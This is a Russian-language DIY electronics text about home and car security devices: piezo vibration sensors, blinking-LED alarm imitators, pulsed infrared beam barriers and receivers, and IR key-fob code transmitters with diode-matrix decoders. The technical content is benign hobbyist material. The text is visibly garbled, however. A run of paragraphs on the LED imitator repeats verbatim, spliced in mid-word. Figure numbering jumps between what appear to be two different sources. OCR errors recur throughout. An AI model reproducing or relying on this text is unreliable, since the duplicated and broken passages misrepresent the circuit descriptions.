Для подключения удаленного датчика к блоку охраны потребуется собрать переходной узел на транзисторе VT3, рис. 3.17. Он позволяет формировать уровень лог. "1" для системы охраны при срабатывании датчика. При свечении светодиода HL1 в цепи питания датчика увеличивается ток. Этот ток, проходя через резистор R8, создает на нем падение напряжения, достаточное для открывания транзистора VT3.
Чувствительность транзистора устанавливается резистором R8, а резистор R7 предотвращает повреждение транзистора VT3 в случае короткого замыкания цепей питания датчика.
Можно также изготовить датчик вибрации на основе цилиндрического пьезоэлемента от головки звукоснимателя, например типа ГЗП-311, рис. 3.18. Такие звукосниматели вряд ли еще производятся, но в продаже из старых запасов пока встречаются. Головка имеет пьезоэпемент в виде трубки. Для его использования в качестве датчика потребуется минимальная доработка. Она заключается в снятии иголки и укорачивании пластмассовых ограничительных выступов (1), как это показано на рисунке. На выступающий конец пьезоэлемента надеваем полиэтиленовую трубку соответствующего диаметра, а на ней закрепляем медную цилиндрическую втулку (2). Втулка имеет внутри центральное отверстие с резьбой М2,5 (резьба обеспечивает лучшее сцепление с полиэтиленовой трубкой, что исключит соскальзывание груза).
Так как пьезоэлемент имеет гибкое крепление, то малейшие вибрации закрепленного на нем груза (2) преобразуются в напряжение. Схема усилителя для такого датчика может быть аналогичной приведенной выше, но с небольшими изменениями, показанными на рис. 3.19.
Применение такой конструкции пьезодатчика позволяет обеспечить чувствительность к колебаниям в двух плоскостях, а также немного уменьшить габариты устройства.
В качестве пьезодатчика возможно также использование пьезоизлучателей из серии ЗП, но в этом случае чувствительность такого устройства уменьшится и срабатывать оно будет только при ударах.
В некоторых серийных импортных сигнализациях используется аналогичная конструкция датчика колебаний на основе пьезоэлемента. Отличие заключается в том, что на пьезоэлемент надета толстая сепиконовая трубка, а на ней уже закреплен груз.
На рис. 3.20 для примера приведена схема так называемого "двухзонного" датчика, выполненного на основе пьезоэлемента. Такие устройства используются в некоторых импортных автомобильных системах охраны. Все устройство собрано на одной микросхеме, содержащей внутри четыре универсальных операционных усилителя.
Датчик имеет два регулятора. Резистор R2 позволяет менять общую чувствительность схемы, a R6 дает возможность устанавливать нужную постоянную времени цепи заряда конденсатора С8, что регулирует чувствительность устройства в зависимости от продолжительности и силы внешних воздействий.
При эксплуатации охраны для облегчения настройки чувствительности датчика в схеме имеются светодиоды HL1, HL2. По их свечению можно контролировать момент срабатывания.
Имитаторы работы охранного устройства
Многие современные системы сигнализации имеют световую индикацию работы режима охраны, что предупреждает окружающих о нахождении автомобиля под электронной охраной. Индикацию обычно выполняют на светодиоде, работающем в прерывистом режиме. Это успокаивает хозяина, так как может заставить неопытного злоумышленника обойти такой автомобиль стороной.
В продаже можно найти мигающие светодиоды со встроенным внутри прерывателем (импортные). По размерам и внешнему виду они не отличаются от обычных, рис. 3.21 (существенно отличается только цена). Например, светодиод типа L-56 (фирмы "KINGBRIGHT") имеет следующие параметры:
максимальное прямое напряжение 2,5 В;
максимальный прямой ток 25 мА;
максимальное обратное напряжение 5 В;
температурный диапазон -40...+85°С.
Минимальное напряжение, при котором начинает работать прерыватель внутри такого светодиода равно 1,5 В (без добавочного резистора). При использовании светодиода с питающим напряжением более 2,5 В необходимо устанавливать токоограничивающий резистор сопротивлением 300...1000 Ом.
Аналогичный сигнализатор может быть установлен в квартире и питаться непосредственно от сети, рис. 3.22. Вор вряд ли будет разбираться, почему мигает индикатор, и поспешит покинуть помещение до возможного приезда наряда милиции или включения сирены.
Светодиодный индикатор с прерывистым свечением несложно изготовить самостоятельно на основе любого обычного светодиода и использовать в качестве имитатора работы охранного устройства. Он устанавливается вблизи лобового стекла или приборной панели и может применяться временно, пока не будет установлена охранная сигнализация, или же работать для отвлечения внимания от места установки подключенной сигнализации. В любом случае это полезно.
Работа такого индикатора в прерывистом режиме снижает потребляемую схемой мощность, что особенно важно при питании от автономного источника.
На рис. 3.23 приведена схема прерывателя для управления работой обычного светодиода. Все устройство выполнено на одной КМОП микросхеме и состоит из двух генераторов. Генератор на элементах DD1.3-DD1.6 работает на повышенной частоте, но при свечении светодиода из-за инерции зрения это не заметно. Такой режим позволяет снизить потребляемый индикатором ток.
Второй генератор (DD1.1-DD1.2) вырабатывает импульсы частотой около 1 Гц, что обеспечивает прерывистость свечения светодием более 2,5 В необходимо устанавливать токоограничивающий резистор сопротивлением 300...1000 Ом.
Аналогичный сигнализатор может быть установлен в квартире и питаться непосредственно от сети, рис. 3.22. Вор вряд ли будет разбираться, почему мигает индикатор, и поспешит покинуть помещение до возможного приезда наряда милиции или включения сирены.
Светодиодный индикатор с прерывистым свечением несложно изготовить самостоятельно на основе любого обычного светодиода и использовать в качестве имитатора работы охранного устройства. Он устанавливается вблизи лобового стекла или приборной панели и может применяться временно, пока не будет установлена охранная сигнализация, или же работать для отвлечения внимания от места установки подключенной сигнализации. В любом случае это полезно.
Работа такого индикатора в прерывистом режиме снижает потребляемую схемой мощность, что особенно важно при питании от автономного источника.
На рис. 3.23 приведена схема прерывателя для управления работой обычного светодиода. Все устройство выполнено на одной КМОП микросхеме и состоит из двух генераторов. Генератор на элементах DD1.3-DD1.6 работает на повышенной частоте, но при свечении светодиода из-за инерции зрения это не заметно. Такой режим позволяет снизить потребляемый индикатором ток.
Второй генератор (DD1.1-DD1.2) вырабатывает импульсы частотой около 1 Гц, что обеспечивает прерывистость свечения светоди-
Инфракрасная техника
С появлением быстродействующих инфракрасных излучателей, прежде всего - ИК диодов, быстро растет интерес к спектру электромагнитных колебаний, имеющих длину волны l=0,8.. .1,3 мкм. Важной особенностью ИК диода является то, что он способен сконцентрировать в короткой вспышке* мощность Римп, в сотни раз превышающую мощность непрерывного его излучения Рнепр. С соответствующим (в ЦРимп /Рнепр раз) увеличением его «дальнобойности».
ИК излучение может быть пространственно преобразованосжато в узкий пучок, сфокусировано, отражено, изогнуто и др. самыми обычными оптическими средствами - линзами, зеркалами, световодами. Важно и то, что в этом диапазоне электромагнитных излучений земная атмосфера сохраняет достаточно высокую прозрачность.
ИК - свободный диапазон. Работа в нем не требует от кого-то - разрешения, кому-то - оплаты и др. В отличие от СВЧ радиодиапазонов, имеющих тот же характер распространения волн, но уже поделенных между старыми и новыми «хозяевами».
Все это может оказаться существенным и при обычном, традиционном использовании электромагнитного излучения - для нужд связи, например, но особенно - в новых приложениях.
Владельцы современных телевизоров, видеомагнитофонов, кондиционеров и др. уже познакомились с инфракрасной техникой:
пульты дистанционного управления многими бытовыми аппаратами используют кодированное ИК излучение. Но это - лишь одно из его применений.
Устройство невидимого ИК барьера, пересечение которого будет зафиксировано охранной системой, показано на рис. 28. В него входит ИЗ - импульсный генератор-излучатель и ПР - фотоприемник, реагирующий лишь на его импульсы.
Рис. 28. ИК барьер
В ИК барьер может быть включено и «зеркало» - пассивный отражатель И К лучей.
Расстояние l, на которое можно разнести фотоприемник и излучатель, зависит от мощности ИК импульсов Римп : l=кЦРимп , где к - коэффициент, учитывающий конструктивные особенности излучателя и реальной чувствительности фотоприемника, его способности выделять на фонепомех сигнал своего ИК излучателя.
Основа инфракрасной техники - импульсные ИК генераторы. Рассмотрим ряд практических их схем и конструкций, которые могут войти в охранную систему нужной конфигурации или быть использованы как-то иначе.
*) Длительность фронта tф и спада tсп ИК вспышки зависит от типа ИК диода. Обычно tф @ tсп=0,1...0,5 мкс. Но существуют ИК диоды, обладающие и значительно большим быстродействием, например, ЗЛ139В с tф @ tсп@0,003 мкс.
Простой ИК генератор
Принципиальная схема генератора приведена на рис. 29. На элементах DD1.1, DD1.2 собран мультивибратор, возбуждающийся на частоте F=30...35 Гц (F@1/2R2*C1). Дифференцирующая цепочка R3C2 и элементы DD1.4...DD1.6 формируют в базе нормально закрытого транзистора VT1 импульс тока длительностью tимп@ 10 мкс (tимп@R3*C2), возбуждающий включенный в его коллектор ИК диод VD1. В таблице 5 приведена зависимость амплитуды тока
Рис.29. Генератор ИК импульсов
Рис. 30. Печатная плата генератора
в ИК диоде Iимп и потребляемого генератором тока Iпотр от напряжения источника питания Uпит.
Печатную плату генератора изготавливают из двустороннего фольгированного стеклотекстолита толщиной 1...1,5 мм (рис. 30). Фольгу со стороны деталей используют лишь в качестве нулевого провода-«земли». В местах пропуска проводников в ней должны быть вытравлены кружки диаметром 1,5...2 мм (на рисунке не показаны), места пайки к нуль-фольге «заземляемых» выводов конденсаторов, резисторов и др. показаны зачерненными квадратами.
В качестве примера на рис. 31 приведена зависимость относительной мощности излучения ИК диода АЛ402 от прямого импульсного тока Iпр.и. Почти линейная их связь и при столь значительном форсаже импульсных токов, которая вообще характерна для ИК диодов, позволяет ориентироваться при расчетах «дальнобойности» системы не на мощность излучения, а на легко контролируемый ток в ИК диоде.
Рис. 31. Зависимость относительной мощности излучения от прямого импульсного тока
Таблица 5
Uпит,B |
Iимп,A |
Iпотр,мА |
4,5 |
0,24 |
0,40 |
5,0 |
0,43 |
0,57 |
6.0 |
0,56 |
0,96 |
7,0 |
0,73 |
1,50 |
8,0 |
0,88 |
2,10 |
9.0 |
1,00 |
2,80 |
Экономичный ИК генератор
Излучатель ИК датчика, реагирующего на прерывание луча, нередко относят от фотоприемника на 10...20 м и более. Его размещение, удовлетворяющее требованиям охранной техники (скрытность позиции, защита от непогоды, намеренной порчи, блокировки и др.), существенно упростится, если он будет выполнен в виде автономно функционирующего блока. Важнейшим параметром такого излучателя будет, очевидно, его способность максимально эффективно использовать энергозапасы встроенного в него источника питания.
Принципиальная схема энергоэкономичного ИК генератора, формирующего достаточно мощные ИК импульсы, показана на рис. 32.
Режим его работы задан мультивибратором, выполненном на микросхеме DD1, в стоки транзисторов которой введены резисторы R1 и R3, многократно снижающие сквозные токи переходного режима. Частота мультивибратора - F@1/2·R2·C1@40 Гц. Длительность импульса тока, возбуждающего ИК диод BL1, зависит от параметров дифференцирующей цепочки R4C3: tимп@R4·C3@10 мкс. Формирователь DD2.3...DD2.6 преобразуют поступающий на его вход импульс с затянутым спадом в «прямоугольный», открывающий на это время до насыщения нормально закрытый транзистор VT1.
Напряжение питания микросхем зависит от номинала резистора R7, при возможных изменениях Uпит оно должно оставаться в пределах +(3...5) В.
Рис. 32. Экономичный генератор ИК импульсов
Рис. 33. Печатная плата ИК генератора
Рис. 34. Компоновка ИК генератора
Таблица 6
Uпит,B |
Iимп,A |
Iпотр, мА |
4,3 |
0,36 |
0,15 |
5 |
0,46 |
0,22 |
6 |
0,64 |
0,31 |
7 |
0,85 |
0,43 |
8 |
1,05 |
0,53 |
9 |
1,1.8 |
0,64 |
10 |
1,36 |
0,75 |
Генератор монтируют на двусторонней печатной плате размером 17,5х55х1,2 мм (рис. 33). Фольгу под деталями используют лишь в качестве нулевой шины-«земли» (с ней соединяют «-» источника питания), в местах пропуска проводников она имеет выборки — кружки диаметром 1,5...2 мм (на рисунке не показаны). Выводы деталей, соединяемые с «землей», припаивают непосредственно к нуль-фольге (показаны зачерненными квадратами).
Транзистор VT1 устанавливают параллельно плате, его выводы согнуты под прямым углом, расстояние между ним и платой - 4...5 мм.
Общая компоновка излучателя показана на рис. 34. Помещенный в гнездо сечением 45х18 мм и глубиной 57...60 мм, вырубленное в стене дома, в столбе веранды, в перилах крыльца, в засохшем дереве и т.п., излучатель маскируют наклейкой подходящего цвета и фактуры. Если она непрозрачна для ИК лучей, в ней делают небольшое, по диаметру ИК диода, отверстие. Батарею питания лучше поместить снизу. Это позволит избежать порчи излучателя в случае ее разгерметизации.
В таблице 6 приведены зависимости Iимп - амплитуды тока в ИК диоде и Iпотр - тока, потребляемого генератором от источника питания, от Uпит - напряжения источника питания. Частота F и длительность tимп остаются при этом практически неизменными.
Токовый КПД ИК излучателя ррррh=Iимп·tимп·F / Iпотр =0,82...0,87. С батареей «Корунд» он сможет проработать непрерывно 2...3 месяца. А с аккумулятором «Ника», 7Д-ОД25 и т.п., подзаряжаемым солнечной батареей (БС-0.5-9П, БСМ-У1.1, Электроника M1 и др.), в не слишком плохих погодных условиях — без ограничения времени.
Приемники импульсного ИК излучения
Из фоточувствительных приборов далеко не все обладают достаточным быстродействием, чтобы реагировать на каждую вспышку ИК диода. Обычно в фотоприемниках импульсного излучения используют фотодиоды (см. приложение 2)*.
Импульсные микротоки, возникающие в фотодиоде при его облучении, необходимо усилить и привести к нормам цифрового стандарта, т.е. преобразовать каждую И К вспышку в импульс напряжения, пригодный для непосредственного управления цифровой микросхемой того или иного типа.
Высокое входное сопротивление и усиление, значительная широкополосность усилителя, пригодного для решения такой задачи, делают его чувствительным к электрическим наводкам самого разного происхождения. В том числе и к работе электронной «начинки» прибора, в который он входит сам. Поэтому фотодиод и его усилитель обычно тщательно экранируют.
Чувствительность фотоприемника может быть заметно снижена паразитной подсветкой. Поэтому его фотодиод прикрывают, как правило, блендой - зачерненным внутри отрезком металлической или пластмассовой трубы, отгораживающим его от источников света, находящихся в стороне от оптической оси.
Прямую, соосную подсветку фотодиода уменьшают фильтрами, ослабляющими видимую часть спектра подсветки. Лучше, конечно, воспользоваться для этого специальным инфракрасным фильтром с полосой прозрачности, совпадающей со спектром излучения ИК диода. Но опыт показывает, что неплохим ИК фильтром может быть тонкий эбонит, гетинакс, окрашенный полистирол, темные пластиковые обои. Однако, почти полностью «отрезая» видимый свет, такие материалы вносят заметное ослабление и в ИК сигнал.
Хотя современный фотодиод имеет, как правило, встроенную оптику, концентрирующую фотопоток на его р-п переходе, из-за малых размеров ее эффективность относительно невелика. Чувствительность фотоголовки значительно увеличится, если ее фотодиод будет помещен в фокус линзы диаметром 20...40 мм и более, концентрирующей на нем значительно больший световой поток. В этом качестве можно использовать, например, конденсор фотоувеличителя. Или объектив от старого фотоаппарата с наводкой на резкость «по метрам», который позволит к тому же настроить оптический канал наилучшим образом.
*) Непригодны, например, фотосопротивления. Достаточно высоким быстродействием обладают вакуумные фотоэлементы и фотоумножители (ФЭУ). Но для их питания требуются источники высокого напряжения: для фотоэлементов 50...300 В, для ФЭУ - до 1 кВ и более (см. приложение 6). Значительные габариты и хрупкость также ограничивают сферу их применения.
ИК приемник на транзисторах
Принципиальная схема приемника импульсных ИК сигналов показана на рис. 35. Его выход может быть подключен ко входу цифровой КМОП-микросхемы непосредственно. Если фотоголовка должна быть удалена от цифрового анализатора, а емкость соединяющего их кабеля превысит 100...200 пФ, фотоусилитель потребуется дополнить буферным усилителем. Таким, например, как на рис. 36, а (усилитель-инвертор) или на рис. 36, б. Емкостная нагрузка фотоголовки с таким усилителем на выходе может быть увеличена до 0,01 мкФ.
Рис. 35. ИК приемник на транзисторах
Рис. 36. Усилители мощности в КМОП-технике
Таблица 7
Uпит,B |
Iпотр,мA |
4,5 |
0,30 |
5,0 |
0,30 |
6,0 |
0,32 |
7,0 |
0,34 |
8,0 |
0,35 |
9,0 |
0,37 |
Фотодиод ФД263-01 можно заменить на ФД320. А при наличии хорошего оптического концентратора - почти на любой из указанных в приложении 2.
ИК приемник сохраняет работоспособность при изменении напряжения источника питания Uпит в широких пределах. Зависимость потребляемого им тока Iпотр от напряжения питания показана в таблице 7.
ИК приемник на микросхеме
Принципиальная схема приемника импульсных ИК сигналов на специально для этой цели разработанной микросхеме показана на рис. 37.
Выход этого фотоприемника также может быть соединен с входами цифровых КМОП-микросхем напрямую. Но хотя его выходное сопротивление меньше, чем у описанного выше транзисторного, при большой длине линии, связывающей фотоприемник с электронным анализатором сигналов, его также нужно дополнить буферным усилителем (см. рис. 36, а, б). Емкость линии связи в этом случае может доходить до 0,01 мкФ.
Фотодиод ФД320 можно заменить на ФД263-01, а если в фотоприемнике есть линза-концентратор - практически любым фотодиодом из приложения 2.
Рис. 37. ИК приемник на микросхеме
Таблица 8
Uпит,B |
Iпотр, мА |
4,5 |
0,84 |
5,0 |
1,00 |
6,0 |
1,30 |
7,0 |
1,55 |
8,0 |
1,90 |
9,0 |
2,90 |
Усиление фотоголовки можно уменьшить, зашунтировав вход усилителя резистором сопротивлением 0,3...3 МОм.
В таблице 8 приведена зависимость тока Iпотр , потребляемого фотоголовкой, от напряжения источника питания Uпит.
Инфракрасная «визитная карточка»
ИК система автоматического опознания узнает «своего» по особому сигналу, который излучает брелок-генератор владельца.
Таким сигналом может быть «пакет», содержащий строго определенное число очень коротких инфракрасных импульсов- вспышек. Факторами, затрудняющими информационный «взлом» такой системы, являются, кроме того, длительность каждой вспышки и длительность всего «пакета». Они ограничиваются, как правило, довольно жесткими пределами.
Ниже описан брелок-генератор, формирующий такой пакет-код, и соответствующее ему приемное устройство.
ИК генератор «визитной карточки» с шифратором
На рис. 38 приведена принципиальная схема ИК генератора, формирующего пакет, содержащий N импульсов, где NО{1,...,1023} - может быть любым в этих пределах*.
Здесь DD1.1, DD1.2, R2, С1 - управляемый мультивибратор, частота возбуждения которого f@160 кГц (f=1/2 R2·C1); DD2 - 14-разрядный двоичный счетчик; R3C2 - дифференцирующая цепочка, формирующая из спада меандра ( 1 на выходе DD1.3) короткий - 5...10 мкс - импульс, открывающий нормально закрытый транзистор VT1; VD1-VD10, R6 - шифратор (диодно-резисторный «И»), числом и размещением диодов в котором задают N;SB1 - кнопка включения излучателя.
При включении питания на входе R счетчика DD2 формируется импульс «единичной» амплитуды, устанавливающий его в исходное состояние (в этом состоянии на всех его выходах устанавливается напряжение низкого уровня), а мультивибратор, сделав семь холостых «оборотов», выходит на нормальный режим работы. Частота следования меандров на выходе 7 DD2 (четвертый разряд счетчика) F=f/2^4=10 кГц. С соответствующими интервалами - Тп@100 мкс- будут следовать друг за другом и 5...10-микросекундные ИК вспышки излучателя BL1.
Рис. 38. ИК генератор «визитной карточки»
Генерация ИК вспышек продолжится до тех пор, пока на выходе шифратора - входе элемента DD1.6 - не появится напряжение высокого уровня, и, соответственно, на его выходе - напряжение низкого уровня, закрывающего мультивибратор. Число импульсов в пакете зависит от числа и «веса» диодов в шифраторе:
N=VD1+2VD2+4VD3+8VD4+16VD5+32VD6+64VD7+128VD8+256VD9 +512VD10, где: VDi=l, если диод VDi установлен в шифратор, и VDi=0, если его нет. Так как N =1023 и Тп=10^4 с, то длительность пакета не превысит, очевидно, 0,11 с.
Амплитуда импульса тока в самом излучателе - в ИК диоде BL1 - зависит от напряжения питания генератора Uп и сопротивления резистора R7: Iи=(Uп-2,5)/R7 (Iи - в амперах, Uпит - в вольтах, R7 - в омах). Здесь, очевидно, Iи@0,07 А.
Однако нет особой необходимости строго следовать указанным номиналам и типам элементов, составляющих генератор. В качестве VT1 может быть взят практически любой n-p-n транзистор с h21э>100 и Iк max>100 мА, а излучателем BL1 могут служить ИК диоды типа АЛ115А, АЛ118А, АЛ119Б, АЛ147А и др. (см. приложение 3). В качестве кнопки SB1 можно воспользоваться каким-либо микропереключателем из перечисленных в приложении 1.
Рис. 39. Печатная плата ИК генератора «визитной карточки»
Особое внимание необходимо уделить постоянно подключенному к источнику питания конденсатору С5, поскольку при неудачном выборе он может оказаться здесь основным энергопотребителем. Если ИК генератор имеет небольшие размеры и питается, соответственно, от источника небольшой емкости, то ток утечки в конденсаторе С5 Ic5<1мкА. При небольших N конденсатор С5 может иметь меньшую емкость (и меньший, соответственно, Ic5). В первом приближении можно принять C5(мкФ)»N.
Печатную плату генератора изготавливают из двухстороннего фольгированного стеклотекстолита толщиной ~1,5 мм (рис. 39). Фольгу со стороны деталей используют лишь в качестве нулевого провода, для пропуска проводников она имеет выборки-кружки диаметром 1.5...2 мм (на рисунке не показаны).
В качестве источника питания ИК генератора можно взять алкалиновую батарею типа 11А (Ж10,3х16 мм, Uп=6 В, Е=33 мА·ч). Заметим, что в подобного рода приборах не так-важна электрическая емкость источника питания, как его саморазряд, физическая сохранность. Лучшие из нынешних батарей - литиевые - сохраняют свою работоспособность до 10 лет.
*) Запись NО{A} означает, что элемент N принадлежит множеству {А}, т.е. может быть одним из перечисленных в нем элементов.
ИК приемник «визитной карточки» с дешифратором
Принципиальная схема приемника «визитной карточки» приведена на рис. 40. Здесь DA1 - микросхема, преобразующая импульс тока, возникающий в фотодиоде VDI под воздействием ИК вспышки, в импульс напряжения, амплитуда которого достаточна для непосредственного управления КМОП-микросхемами (рис. 41, а). На элементах DD1.1 и DD1.2 собран одновибратор, преобразующий короткий импульс, соответствующий длительности ИК вспышки*, в импульс длительностью tф=50 мкс (tф@1/2 tп, где tп - период следования ИК вспышек в кодовой посылке (рис. 41, б)). На элементах DD1.3, DD2.3-DD2.5 собрано устройство, формирующее импульс на входе R счетчика DD3 (рис. 41, г), которым он переводится в нулевое состояние по фронту первой же ИК вспышки, и временной
Рис. 40. ИК приемник «визитной карточки»
Рис. 41. Эпюры сигналов в ИК приемнике
интервал Тпр (рис. 41, в), в пределах которого счетчик DD3 может беспрепятственно вести подсчет импульсов (по их спаду), поступающих на его вход С.
Дешифрация кодовой посылки, выяснение того, содержит ли она Nкод - кодовое число импульсов, возлагается на дешифратор Д1. В качестве примера, демонстрирующего его структуру, на рис. 42, а приведена конфигурация Д1 для Nкод=284. Поскольку «вес» выхода Qi в DD3 равен 2^(i-1), то в двоичной записи Nкод=000100011100 (2^(3-1)+ +2^(4-1)+2^(5-1)+2(9-1)=4+8+16+256=284). Дешифратор состоит из 4-входового конъюнктора** (Rl, VD3-VD5, VD9), входы которого
Рис. 42. Дешифратор для Nкод=284
подключены ко всем Qi=1, и 8-входового дизъюнктора (R2, VD1, VD2, VD6-VD8, VD10, VD12), входы которого подключены ко всем Qj=0. Легко видеть, что напряжение высокого уровня (лог.1) возникнет и сохранится на выходе DD1.4 (см. рис. 41, д) лишь в случае, если в счетчике DD3 будет зафиксирован Nкод, в любом другом оно так или иначе будет сведено к нулю. На рис. 42, б показана конфигурация конъюнктора в шифраторе ИК излучателя, формирующего Nкод =284; иное его положение на выходах счетчика связано с тем, что «вес» выхода Qi здесь равен 2^(i-5).
Подобную же структуру будет иметь дешифратор Д1 и для другого Nкод , с иными, конечно, позициями диодов в конъюнктере и дизъюнкторе.
Для того, чтобысистема реагировала на Nкод лишь при достаточно длительной его экспозиции, в цепь формирования выходного сигнала введена цепочка R9·C11@tэксп. Обычно принимают tэксп =0,3...3 с. На кратковременное появление Nкод (в попытках, например, побыстрее подобрать код) такая система просто не отреагирует.
Выход устройства - транзистор VT1 с открытым коллектором - может быть дополнен тем или иным исполнительным механизмом. Например, тональным генератором (рис. 43, а), предупреждающим
Рис. 43. Тональный генератор (а) и электронный ключ к электромеханическому замку (б)
о приходе «своего», или электронным ключом, управляющим электромагнитным замком Y1 (рис. 43, б).
В правильно собранном И К приемнике потребуется, возможно, уменьшить его чувствительность. Это можно сделать как электрически - зашунтировав, например, вход усилителя DA1 резистором R12 (показан на рис. 40 штриховой), так и оптически - прикрыв фотодиод «серым» фильтром, в качестве которого можно использовать, например, пластиковые обои, выполняющие заодно и функцию фильтра, почти полностью «отрезающего» видимую часть спектра паразитной подсветки.
Опыт показал, что излучение ИК генератора способно «пробить» даже 1,5...2-миллйметровый пластик. Кроме того, защитная накладка больших размеров, не позволяющая визуально определить положение фотодиода, окажется еще одним препятствием на пути несанкционированного проникновения в систему.
Защита от подбора кода - основная забота конструкторов такого рода устройств. Принятая здесь система кодирования относительно проста: Nкод - лишь одно число из тысячи возможных. Но подбор кода осложнен здесь и рядом других обстоятельств. Заметим, что длительность кодовой посылки Ткод не может быть ни слишком малой (иначе «слипнутся» импульсы на входе С счетчика DD3), ни слишком большой, больше Тпр (следующая затем ИК вспышка трансформируется в R-импульс, возвращающий DD3 в исходное состояние). Осложняет подбор кода и t^, во всяком случае очень его замедляет. Защитные функции заложены даже в яркость ИК вспышки - она должна быть лишь достаточной. Повышенная освещенность фотодиода может вывести фотоголовку приемника из рабочего режима и. привести к ошибкам в счете;
И все это, заметим, при отсутствии каких-либо специальных контрмер, которые здесь, конечно же, нетрудно предусмотреть. Можно ввести еще один (или не один) находящийся в стороне фотодатчик, засветка которого немедленно заблокирует систему. Или блокировку, реагирующую на слишком большое число сделанных попыток. Более четырех за минуту, например. Блокировки могут, конечно, и дополнять друг друга.
На рис. 44 показана печатная плата ИК приемника. Ее изготавливают из двустороннего фольгированного стеклотекстолита толщиной 1.5...2 мм. Фольгу со стороны деталей используют лишь в качестве нулевой шины-«земли» (к ней присоединен «-» источника питания), в местах пропуска проводников она имеет вытравленные
Рис. 44. Печатная плата ИК приемника «визитной карточки»
кружки диаметром 1.5...2 мм (на рисунке не показаны). Соединения с нуль-фольгой «заземляемых» выводов показаны зачерненными квадратами.
фотоусилитель (VD1, DA1 и др.) с его большой чувствительностью, широкополосностью, высоким входным сопротивлением необходимо экранировать. В противном случае электрические наводки, в том числе и от работы собственного дешифратора, могут сделать ИК приемник совершенно неработоспособным. Экран, имеющий «окно» для фотодиода, изготавливают из жести в виде коробки и припаивают к нуль-фольге в двух-трех точках. На рис. 44 штриховой линией показано примерное его расположение.
Таблица 9
Uпит, В |
Iпотр, мА |
4,2 |
0,9 |
5,0 |
1,1 |
6,0 |
1,3 |
7,0 |
1,6 |
8.0 |
1,9 |
9,0 |
2,3 |
Рекомендуется также принять меры к минимизации подсветки фотодиода посторонними источниками света, поскольку это может заметно снизить чувствительность приемника к сигналам своего ИК генератора. В качестве бленды, ограничивающей боковой подсвет фотодиода, можно взять отрезок зачерненной внутри пластмассовой или металлической тубы диаметром 10... 15 мм.
Фоточувствительную часть приемника можно изготовить в виде отдельной головки, соединенной с другими его элементами тонким трехпроводным кабелем («+», «-», выв. 10 DA1). Малые размеры такой фотоголовки позволят установить ее в вырезе дверного «глазка», за маскирующей накладкой в толще двери, в дверной коробке и т.п.
ИК приемник сохраняет работоспособность в широком диапазоне питающих напряжений. Зависимость потребляемого им тока Iпотр от напряжения питания Uпит показана в таблице 9.
*) Напомним, что длительность импульса на выходе фотоусилителя DA1 зависит не только от длительности ИК вспышки, но и ее яркости - освещенности фотодиода. Причина - в относительно медленном восстановлении его темновой проводимости.
**) Физические элементы, реализующие конъюнкцию и дизъюнкцию, - так в работах по математической логике обычно называют логические функции И и ИЛИ. Если мы и далее намерены пользоваться результатами математических исследований и не намерены повторять их (что было бы, кстати, совсем непросто), то должны, как минимум, понимать их язык.
Инфракрасный «электронный пароль»
Независимо от характера излучения, будь то радиоволна, ультразвук или свет, особое внимание в устройствах автоматического опознания «своего» уделяют самому сигналу. Основное к нему требование: вероятность появления точно такого же сигнала из постороннего источника должна быть пренебрежимо малой.
В современной технике кодовая посылка обычно имеет вид двоичной последовательности, например, 1001101000111..., где единице соответствует наличие излучения, а нулю - пауза «чистого» эфира или какое-то другое излучение. Если n - число разрядов (знако мест) в таком сигнале, то по-разному расставляя единицы и нули, мы сможем получить 2" различных их сочетаний. Так при n=7 их 128, при n=15-32768, а при n=23 - 8388608.
Среди множества возможных какую-то одну двоичную последовательность выделяют особо - в качестве кода, электронного пароля.
ИК генератор «электронного пароля» с шифратором
На рис. 45 приведена принципиальная схема генератора, формирующего подобным образом последовательность инфракрасных вспышек.
Здесь DD1.1, DD1.2, Rl, ZQ1 - задающий генератор, работающий на частоте часового кварцевого резонатора ZQ1 - 32768 Гц. Микросхемы DD4 и DD5 составляют электронный коммутатор, его выход (объединенные выводы 3 DD4 и DD5) оказывается соединенным с одним из Х-входов этих микросхем в зависимости от адреса, поступающего на входы 1, 2,4, и сигнала на входе S (активизируется микросхема с S=0). Адрес и сигнал S формирует счетчик DD3. Легко вычислить, что смена адреса будет происходить здесь каждые 0,976 мс ((2^5)/32768 с), это tзн - длительность знакоместа в кодовой посылке В середине каждого знакоместа может быть сформирован короткий (R4C2@10 мкс) импульс на выходе DD1.4. Но это произойдет лишь в том случае, если данному знакоместу будет соответствовать сигнал 1 на выходе коммутатора. Этот импульс откроет нормально запертый транзисторный усилитель (VT1, VT2 и др.) и ток, возникший в ИК диоде BI1, преобразуется в ИК вспышку той же длительности.
Рис. 45. ИК генератор «электронного пароля»
Генерация кодовой последовательности начинается (SA1 включен, кнопка SB1 нажата) с формирования короткого импульса на входе R счетчика DD3 (tr@R3·C1), устанавливающего его в исходное, нулевое состояние, и заканчивается с появлением сигнала 1 на выходе 29(вьIB. 14) DD3. Знакоместа - их, очевидно, 16 - следуют во времени в соответствии нумерацией (по стрелкам) Х-входов электронных коммутаторов: 1, 2,..., 14, 15 (нулевому знакоместу всегда соответствует 1; это стартовый импульс пакета, не входящий, конечно, в число кодообразующих). Общая продолжительность кодовой посылки составит таким образом 0,976x15@14,6 мс.
Нужное число-код формируют, так или иначе коммутируя Х-входы микросхем DD4, DD5: соединяя i-ую стрелку с «+» источника питания, если в i-том разряде кода должна быть 1 (X1 DD4, формирующий стартовый импульс пакета , уже соединен с +Uп, или с «землей», если должен быть 0. Так, например, для генерации кода 111011100111001 потребуется соединить стрелки 1, 2, 3, 5, 6, 7, 10, 11, 12, 15 с «+», а стрелки 4, 8, 9,13, 14 - с «-» источника питания.
Рис. 46. Печатная плата ИК генератора «электронного пароля»
Поскольку n=15, то число различных сигналов, из которых любой может быть закоммутирован в качестве кодового, составляет здесь 2^15=32768.
Генератор монтируют на печатной плате, изготовленной из двустороннего фольгированного стеклотекстолита толщиной 1,2...1,5 мм (рис. 46). Фольгу со стороны деталей используют лишь в качестве общего провода (с ней соединен «-» источника питания): в местах пропуска проводников она должна иметь выборки - кружки диаметром 1,5...2 мм (на рисунке не показаны). Места соединения с нуль-фольгой «заземляемых» выводов резисторов, конденсаторов и др. показаны черными квадратами; черными квадратами со светлой точкой в центре - «заземляемые» выводы микросхем и положение проволочной перемычки, соединяющей с нуль-фольгой «минусовой» вывод конденсатора С4.
В качестве источника питания генератора можно взять 6-вольтную батарею 11 А (габариты - Ж10,3х16 мм, электрическая емкость - 33 мА·ч).
Выключатель SA1 типа ПД9-1 монтируют непосредственно на корпусе генератора. Кнопка SB1, типа ПКн-159 или подобная ей,
должна иметь провод длиной 6...8 мм, достаточный для его вывода сквозь стенку корпуса.
